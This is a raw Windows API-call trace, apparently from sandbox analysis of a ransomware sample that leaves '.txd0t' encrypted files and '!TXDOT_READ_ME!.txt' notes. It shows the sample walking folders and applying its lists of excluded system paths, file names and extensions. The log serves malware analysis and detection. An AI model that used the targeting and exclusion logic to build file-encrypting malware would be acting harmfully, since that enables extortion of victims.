[0128.733] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\appdata\\local\\") returned 0x0 [0128.733] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.733] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.733] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.733] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\boot\\") returned 0x0 [0128.733] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\perflogs\\") returned 0x0 [0128.733] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\programdata\\") returned 0x0 [0128.733] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\drivers\\") returned 0x0 [0128.733] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\wsus\\") returned 0x0 [0128.733] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.733] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.733] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="crypt_detect") returned 0x0 [0128.733] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="cryptolocker") returned 0x0 [0128.733] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="ransomware") returned 0x0 [0128.733] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="C:\\WINDOWS") returned 0x0 [0128.733] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.733] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="C:\\Program Files") returned 0x0 [0128.733] GetProcessHeap () returned 0xe30000 [0128.733] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.733] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1041", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041") returned="C:\\588bce7c90097ed212\\1041" [0128.733] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\*") returned="C:\\588bce7c90097ed212\\1041\\*" [0128.733] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1041\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x585ab28c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x585ab28c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.734] StrCmpW (psz1=".", psz2=".") returned 0 [0128.734] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x585ab28c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x585ab28c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.734] StrCmpW (psz1="..", psz2=".") returned 1 [0128.734] StrCmpW (psz1="..", psz2="..") returned 0 [0128.734] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x584901ff, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x584901ff, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x584c6483, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.734] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.734] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.734] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1041", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041") returned="C:\\588bce7c90097ed212\\1041" [0128.734] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\") returned="C:\\588bce7c90097ed212\\1041\\" [0128.734] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1041\\!TXDOT_READ_ME!.txt" [0128.734] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.734] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.734] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x585ab28c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x298d, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.734] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.734] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.734] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1041", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041") returned="C:\\588bce7c90097ed212\\1041" [0128.734] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\") returned="C:\\588bce7c90097ed212\\1041\\" [0128.734] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1041\\eula.rtf.txd0t" [0128.734] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.734] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.735] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5847c4b7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x10c82, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.735] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.735] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.735] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1041", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041") returned="C:\\588bce7c90097ed212\\1041" [0128.735] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\") returned="C:\\588bce7c90097ed212\\1041\\" [0128.735] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.txd0t" [0128.735] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.735] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.735] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.735] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.735] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.735] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1041", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041") returned="C:\\588bce7c90097ed212\\1041" [0128.735] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\") returned="C:\\588bce7c90097ed212\\1041\\" [0128.735] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" [0128.735] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.735] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.735] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.735] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.735] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.735] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.735] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.735] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.735] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.735] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.735] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.735] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.735] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.735] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.735] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.735] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.735] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.735] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.735] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.735] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.736] GetProcessHeap () returned 0xe30000 [0128.736] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.736] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x586c4a47, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x586c4a47, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1042", cAlternateFileName="")) returned 1 [0128.736] StrCmpW (psz1="1042", psz2=".") returned 1 [0128.736] StrCmpW (psz1="1042", psz2="..") returned 1 [0128.736] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.736] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.736] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1042", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1042") returned="C:\\588bce7c90097ed212\\1042" [0128.736] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\windows\\system32\\") returned 0x0 [0128.736] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.736] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\windows\\system\\") returned 0x0 [0128.736] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.736] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.736] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\appdata\\local\\") returned 0x0 [0128.736] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.736] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.736] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.736] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\boot\\") returned 0x0 [0128.736] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\perflogs\\") returned 0x0 [0128.736] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\programdata\\") returned 0x0 [0128.736] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\drivers\\") returned 0x0 [0128.736] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\wsus\\") returned 0x0 [0128.736] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.736] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.736] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="crypt_detect") returned 0x0 [0128.736] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="cryptolocker") returned 0x0 [0128.736] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="ransomware") returned 0x0 [0128.736] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="C:\\WINDOWS") returned 0x0 [0128.736] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.736] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="C:\\Program Files") returned 0x0 [0128.736] GetProcessHeap () returned 0xe30000 [0128.736] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.736] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1042", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042") returned="C:\\588bce7c90097ed212\\1042" [0128.736] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\*") returned="C:\\588bce7c90097ed212\\1042\\*" [0128.737] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1042\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x586c4a47, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x586c4a47, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.737] StrCmpW (psz1=".", psz2=".") returned 0 [0128.737] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x586c4a47, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x586c4a47, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.737] StrCmpW (psz1="..", psz2=".") returned 1 [0128.737] StrCmpW (psz1="..", psz2="..") returned 0 [0128.737] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x584a002a, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x584a002a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x584c6483, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.737] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.737] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.737] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1042", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042") returned="C:\\588bce7c90097ed212\\1042" [0128.737] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\") returned="C:\\588bce7c90097ed212\\1042\\" [0128.737] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1042\\!TXDOT_READ_ME!.txt" [0128.737] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.737] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.737] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x584a002a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x338f, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.737] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.737] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.737] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1042", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042") returned="C:\\588bce7c90097ed212\\1042" [0128.737] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\") returned="C:\\588bce7c90097ed212\\1042\\" [0128.738] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1042\\eula.rtf.txd0t" [0128.738] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.738] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.738] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x585ab28c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x100d6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.738] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.738] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.738] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1042", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042") returned="C:\\588bce7c90097ed212\\1042" [0128.738] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\") returned="C:\\588bce7c90097ed212\\1042\\" [0128.738] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.txd0t" [0128.738] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.738] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.738] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.738] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.738] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.738] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1042", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042") returned="C:\\588bce7c90097ed212\\1042" [0128.738] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\") returned="C:\\588bce7c90097ed212\\1042\\" [0128.738] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" [0128.738] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.738] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.738] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.738] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.738] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.738] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.738] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.738] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") 